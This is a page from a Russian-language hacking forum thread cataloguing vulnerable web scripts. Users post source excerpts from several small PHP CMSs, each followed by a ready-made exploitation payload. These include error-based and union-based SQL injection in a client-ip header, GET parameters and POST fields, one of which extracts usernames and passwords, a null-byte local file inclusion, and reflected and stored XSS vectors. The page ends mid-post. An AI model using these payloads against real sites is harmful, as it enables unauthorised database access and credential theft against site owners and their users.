FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Энциклопедия уязвимых скриптов

Страница 44 из 52

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

23.02.2011, 22:53

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Ragnarok Online Site Engine

http://sourceforge.net/projects/ro-se/

SQLi

include_before.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getIP[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#FF8000"]// был ли сегодня, если нет то добавим хапись вместе с реф страницей, если был, то добавим счетчик за этот день

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT count(*) as cnt FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter WHERE DATE_FORMAT(date, '%Y%m%d')='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ymd"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' and `ip`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]GetAll[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'cnt'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#FF8000"]// был сегодня, обновим счетчик

[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter SET `count`=`count`+1 WHERE DATE_FORMAT(date, '%Y%m%d')='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ymd"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' and `ip`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);

}else{[/COLOR][COLOR="#FF8000"]// ненбыло сегодня, добавим с реферрером

[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter (`count`, `ip`, `ref`, `date`) VALUES ('1', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_REFERER"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', NOW())"[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][/COLOR]

/include/functions.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]getIP[/COLOR][COLOR="#007700"]() {

    if([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"])) { 

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"]); 

    } elseif([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"])) { 

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"]); 

    } else { 

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]); 

    } 

    return[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR]

/include/db_connect.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){

    global[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"];

    if(isset([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'debug'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'debug'[/COLOR][COLOR="#007700"]]){

        echo[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];

    }

    if([/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]);

        }else{

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

        }

    if([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]()){

        echo[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];

        echo[/COLOR][COLOR="#DD0000"]"query:"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];

        return[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

    }else{

        return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];

    }

}

[/COLOR][/COLOR]

Как видно из кода у нас инъекция в хедере при чем в селекте и инсерте, покажу варианты раскрутки. Еще больше меня порадовала функция запроса, в случае ошибки она выводит саму ошибку + сам запрос, и нет никаких exit`ov и die`v.

Эксплуатация: http://site.com/index.php

Код:

Code:
client-ip: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'

либо

Код:

Code:
client-ip: ', 'lala', NOW()) on duplicate key update a=(select 1 from(select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))a)-- 1

01.03.2011, 03:31

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

EyeX CMS

http://sourceforge.net/projects/eyex/

SQLi / LFI

Need:

mq=off

index.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]];

if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]];    }

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]}

}else{

[/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT mod_status, mod_folder FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_mods WHERE mod_folder='[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);

list([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"])){

if([/COLOR][COLOR="#0000BB"]is_admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"])){

        include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);

}else{

    if([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"]){

        include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);

    }else{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOACTIVE"[/COLOR][COLOR="#007700"]);

    }

}

}else{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOMOD"[/COLOR][COLOR="#007700"]);

}

}

[/COLOR][/COLOR]

/system/sql_functions.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_QUERY"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_query"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_FETCH"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_fetch_row"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_NROWS"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_numrows"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_QUERY[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_FETCH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_NROWS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR]

Ну думаю тут все ясно, полученный результат из выборки инклюдится.

Эксплуатация:

Код:

Code:
http://localhost/eyexcms/index.php?sec=assdas'+union+select+1,'../../readme.txt%00'-- 1

SQLi

Need:

mq=off

/Addons/mods/news/main.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];

if(empty([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"](){

global[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'article'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]ROhead[/COLOR][COLOR="#007700"]();

if(empty([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]wmsg[/COLOR][COLOR="#007700"]();

}

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT nid, ntitle, ntext, ndate, nautor, topic FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news WHERE nid='[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);

list([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]change_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]comentarios[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]ROfoot[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]switch([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]){

case[/COLOR][COLOR="#DD0000"]"ReadStory"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"]();break;

case[/COLOR][COLOR="#DD0000"]"SaveComment"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]SaveComment[/COLOR][COLOR="#007700"]();break;

default:[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]();break;

}

[/COLOR][/COLOR]

Эксплуатация:

Код:

Code:
http://localhost/eyexcms/index.php?sec=news&st=ReadStory&article=-1'+union+select+1,version(),3,4,5,6-- 1

15.03.2011, 23:41

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

mapmyglobe

http://sourceforge.net/projects/mapmyglobe/

BSQLi

/user/caccnut.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password1'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password2'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];

require_once[/COLOR][COLOR="#DD0000"]'../lib/dbconfig.php'[/COLOR][COLOR="#007700"];

require_once[/COLOR][COLOR="#DD0000"]'../lib/liblogin.php'[/COLOR][COLOR="#007700"];

require_once[/COLOR][COLOR="#DD0000"]'../lib/config.php'[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]){

  echo[/COLOR][COLOR="#DD0000"]"Different passwords. Please try again."[/COLOR][COLOR="#007700"];

  exit;

}

if ([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))){

  echo[/COLOR][COLOR="#DD0000"]"Username must start with a letter. Please try again."[/COLOR][COLOR="#007700"];

  exit;

}

if ([/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"^[a-zA-Z0-9_]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-\.]+$]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"])){

  echo[/COLOR][COLOR="#DD0000"]"Wrong email format. Please try again."[/COLOR][COLOR="#007700"];

  exit;

}

[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'select * from user where name="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"])){

  echo[/COLOR][COLOR="#DD0000"]"Username already exists. Please try again."[/COLOR][COLOR="#007700"];

  exit;

}

[/COLOR][/COLOR]

/lib/dbconfig.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]) {

  global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"]);

  if (![/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {

    if ([/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'prod'[/COLOR][COLOR="#007700"]]){

      die([/COLOR][COLOR="#DD0000"]"Invalid query"[/COLOR][COLOR="#007700"]);

    }

    else{

      die([/COLOR][COLOR="#DD0000"]"Invalid query --[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#DD0000"]-- "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

    }

  }

  return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR]

$conf['prod'] по умолчанию не установлен, поэтому имеем вывод в ошибке.

Эксплуатация:

Код:

Code:
http://localhost/mapmyglobe-0.1/user/caccnt.php
POST:
username="and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and"

31.03.2011, 21:04

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

CMS ElcoSite

Активная XSS вида ">[XSS] в форме для комментариев по адресу

Цитата:

Сообщение от None

/publication.mhtml

Пассивная XSS

Цитата:

Сообщение от None

/search.mhtml?Search=">alert(%2Fxss%2F)
/publication.mhtml?Part=38&PubID=1%22%3E%3Cscript%3 Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
/publication.mhtml?Part=3">

------------------------------------------> UPD UPD

02.04.2011, 09:41

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

MediaWiki, Эскейп-последовательности приводящие к XSS в IE

CMS MediaWiki

Уязвимая версия: 1.15.3

Из-за неправильной обработки управляющих последовательностей, создается возможность првоедения XSS в стилях CSS, при просмотре web страницы через браузер Internet Explorer.

Для использования данной уязвимости необходимо вставить последвательность "\72" в формате "" внутри тэга объявляющего URL, т.е

Эксплойт

Цитата:

Сообщение от None

url([
JAVASCRIPT
])

12.04.2011, 10:26

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Email Management Software || Скрипт для создания электронного почтового сервиса

Название скрипта: one_mail

Сайт автора:

Код:

Code:
http://www.everyone.net/index.html

Описание уязвимостей:

Множесвенные XSS уявзвимости вида ">[XSS]

Адрес уязвимой страницы:

Код:

Code:
http://localhost/email/scripts/collectRegistrationInfo.pl

18.04.2011, 00:38

Jаger

Guest

Сообщений: n/a

Провел на форуме:
2301

Репутация: 10

Muzica Free Version 1

SQL Injection:

Download
melodie.php
PHP код:

PHP: [COLOR="#000000"][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'melodie'[/COLOR][COLOR="#007700"]]; [/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id_categorie, nume_melodie, vizualizari_melodie, data_melodie, text_melodie, download_melodie FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nume_baza[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".melodie WHERE id_melodie ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]); [/COLOR][/COLOR]
http://localhost/melodie.php?melodie=1 union select 1,2,3,4,5,6

07.05.2011, 04:04

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

230 CMS

1. SQLi (права админа)

File:/include/edit/edit.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"articles WHERE pagename = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pagename'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][/COLOR]

PoC: POST pagename=1&id=1'+union+select+1,concat_ws(0x3a,use rname,password),3,4,5+from+230_users--+

2. SQLi в INSERT (права админа)

File:/include/edit/create.php

PHP код:


		
			
PHP:
